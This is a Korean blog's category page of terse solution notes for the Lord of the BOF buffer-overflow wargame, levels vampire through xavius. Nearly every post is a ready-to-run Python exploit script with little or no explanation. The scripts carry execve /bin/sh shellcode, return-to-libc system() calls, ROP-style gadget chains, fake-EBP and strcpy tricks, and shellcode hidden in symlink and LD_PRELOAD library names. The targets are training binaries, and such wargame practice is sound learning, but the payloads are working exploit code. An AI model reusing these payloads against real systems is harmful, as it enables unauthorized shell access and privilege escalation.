'Wargame/Lord Of the Bof(redhat)' 카테고리의 글 목록

[Remind] LOB nightmare -> xavius

Wargame/Lord Of the Bof(redhat) 2019. 4. 23. 00:30

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
shellAddress =  p(0x40015000)

payload = "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+shellAddress

print payload

(python exploit.py ;cat) | ./xavius

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB succubus -> nightmare (0)	2019.04.22
[Remind] LOB zombie_assassin-> succubus (0)	2019.04.19
[Remind] LOB assassin -> zombie_assassin (0)	2019.04.19
[Remind] LOB giant-> assassin (0)	2019.04.18
[Remind] LOB bugbear -> giant (0)	2019.04.18

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB succubus -> nightmare

Wargame/Lord Of the Bof(redhat) 2019. 4. 22. 23:42

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/succubus/nightmare'
strcpyAddress = p(0x8048410)
shellAddress = p(0xbffffa74)
shellCode = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*11
dstAddress = p(0xbffffaa0)
srcAddress = p(0xbffffa70)
payload = shellCode+"A"*4+strcpyAddress+"A"*4+dstAddress+srcAddress

os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB nightmare -> xavius (0)	2019.04.23
[Remind] LOB zombie_assassin-> succubus (0)	2019.04.19
[Remind] LOB assassin -> zombie_assassin (0)	2019.04.19
[Remind] LOB giant-> assassin (0)	2019.04.18
[Remind] LOB bugbear -> giant (0)	2019.04.18

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB zombie_assassin-> succubus

Wargame/Lord Of the Bof(redhat) 2019. 4. 19. 04:00

chainning.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/zombie_assassin/succubus'
doAddress = p(0x80487ec)
gyeAddress = p(0x80487bc)
gulAddress = p(0x804878c)
yutAddress = p(0x804875c)
moAddress = p(0x8048724)
paramAddress = p(0xbffffa48)
payload = "A"*44+doAddress+gyeAddress+gulAddress+yutAddress+moAddress+"AAAA"+paramAddress+"\x2f\x62\x69\x6e"+"\x2f\x73\x68"
os.execl(path,path,payload)

retSled.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/zombie_assassin/succubus'
doAddress = p(0x80487ec)
shellAddress = p(0xbffffa14)
shellCode ="\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
payload = "A"*44+doAddress+shellAddress+shellCode

os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB nightmare -> xavius (0)	2019.04.23
[Remind] LOB succubus -> nightmare (0)	2019.04.22
[Remind] LOB assassin -> zombie_assassin (0)	2019.04.19
[Remind] LOB giant-> assassin (0)	2019.04.18
[Remind] LOB bugbear -> giant (0)	2019.04.18

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB assassin -> zombie_assassin

Wargame/Lord Of the Bof(redhat) 2019. 4. 19. 03:20

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/assassin/zombie_assassin'
leaveRetGaget = p(0x80484df)
shellAddress = p(0xbffffa74)
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
fEbpAddress = p(0xbffffa6c)
payload = shellAddress+"\x90"*11+shellCode+fEbpAddress+leaveRetGaget

os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB succubus -> nightmare (0)	2019.04.22
[Remind] LOB zombie_assassin-> succubus (0)	2019.04.19
[Remind] LOB giant-> assassin (0)	2019.04.18
[Remind] LOB bugbear -> giant (0)	2019.04.18
[Remind] LOB darkknight -> bugbear (0)	2019.04.16

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB giant-> assassin

Wargame/Lord Of the Bof(redhat) 2019. 4. 18. 01:15

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/giant/assassin'
retGaget = p(0x804851e)
shellAddress = p(0xbffffbd8)
payload = "A"*44+retGaget+shellAddress

os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB zombie_assassin-> succubus (0)	2019.04.19
[Remind] LOB assassin -> zombie_assassin (0)	2019.04.19
[Remind] LOB bugbear -> giant (0)	2019.04.18
[Remind] LOB darkknight -> bugbear (0)	2019.04.16
[Remind] LOB golem -> darkknight (0)	2019.04.16

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB bugbear -> giant

Wargame/Lord Of the Bof(redhat) 2019. 4. 18. 00:45

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/bugbear/'+p(0xbffffc79)
systemAddress = p(0x400A9D48)
param1 = p(0xbffffc79)
param2 = p(0xbffffff7)
param3 = p(0xbffffffc)
payload = "A"*44 + systemAddress + "BBBB" + param1 + param2 + param3

os.system("mv /home/bugbear/giant "+p(0xbffffc79))
os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB assassin -> zombie_assassin (0)	2019.04.19
[Remind] LOB giant-> assassin (0)	2019.04.18
[Remind] LOB darkknight -> bugbear (0)	2019.04.16
[Remind] LOB golem -> darkknight (0)	2019.04.16
[Remind] LOB skeleton -> golem (0)	2019.04.16

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB darkknight -> bugbear

Wargame/Lord Of the Bof(redhat) 2019. 4. 16. 23:24

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/darkknight/bugbear'
systemAddress = p(0x40058ae0)
shellParamAddress = p(0xbffffc6d)
payload = "A"*44 + systemAddress + "BBBB" + shellParamAddress

os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB giant-> assassin (0)	2019.04.18
[Remind] LOB bugbear -> giant (0)	2019.04.18
[Remind] LOB golem -> darkknight (0)	2019.04.16
[Remind] LOB skeleton -> golem (0)	2019.04.16
[Remind] LOB vampire -> skeleton (0)	2019.04.16

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB golem -> darkknight

Wargame/Lord Of the Bof(redhat) 2019. 4. 16. 21:37

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/golem/darkknight'
shellAddress = p(0xbffffa98)
FPO_Byte = "\x90"
payload = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*11+FPO_Byte

os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB bugbear -> giant (0)	2019.04.18
[Remind] LOB darkknight -> bugbear (0)	2019.04.16
[Remind] LOB skeleton -> golem (0)	2019.04.16
[Remind] LOB vampire -> skeleton (0)	2019.04.16
[Remind] LOB troll -> vampire (0)	2019.04.16

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB skeleton -> golem

Wargame/Lord Of the Bof(redhat) 2019. 4. 16. 20:04

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/skeleton/golem'
shellAddress =  p(0xbffff530)
payload = "A"*44+shellAddress
shellCode = "\x90"*155+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"

os.system("touch test.c")
os.system("gcc -shared -fPIC -o " + shellCode + " test.c")
os.environ["LD_PRELOAD"] = "./"+shellCode
os.execl(path,path,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB darkknight -> bugbear (0)	2019.04.16
[Remind] LOB golem -> darkknight (0)	2019.04.16
[Remind] LOB vampire -> skeleton (0)	2019.04.16
[Remind] LOB troll -> vampire (0)	2019.04.16
[Remind] LOB orge -> troll (0)	2019.04.15

JeonYoungSin

메모 기록용 공간

,

[Remind] LOB vampire -> skeleton

Wargame/Lord Of the Bof(redhat) 2019. 4. 16. 02:12

exploit.py

import os
from struct import *

p = lambda x : pack("<L" , x)
path = '/home/vampire/skeleton'
shellAddress = p(0xbfffff2c)
payload = "A"*44+shellAddress
shellCode = "\x90"*98+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100

os.system("/bin/ln -s " + path + " " + shellCode)

os.execl("./"+shellCode,"./"+shellCode,payload)

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB golem -> darkknight (0)	2019.04.16
[Remind] LOB skeleton -> golem (0)	2019.04.16
[Remind] LOB troll -> vampire (0)	2019.04.16
[Remind] LOB orge -> troll (0)	2019.04.15
[Remind] LOB darkelf -> orge (0)	2019.04.15

JeonYoungSin

메모 기록용 공간

,

'Wargame/Lord Of the Bof(redhat)'에 해당되는 글 37건

[Remind] LOB nightmare -> xavius

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB succubus -> nightmare

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB zombie_assassin-> succubus

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB assassin -> zombie_assassin

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB giant-> assassin

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB bugbear -> giant

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB darkknight -> bugbear

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB golem -> darkknight

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB skeleton -> golem

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

[Remind] LOB vampire -> skeleton

'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31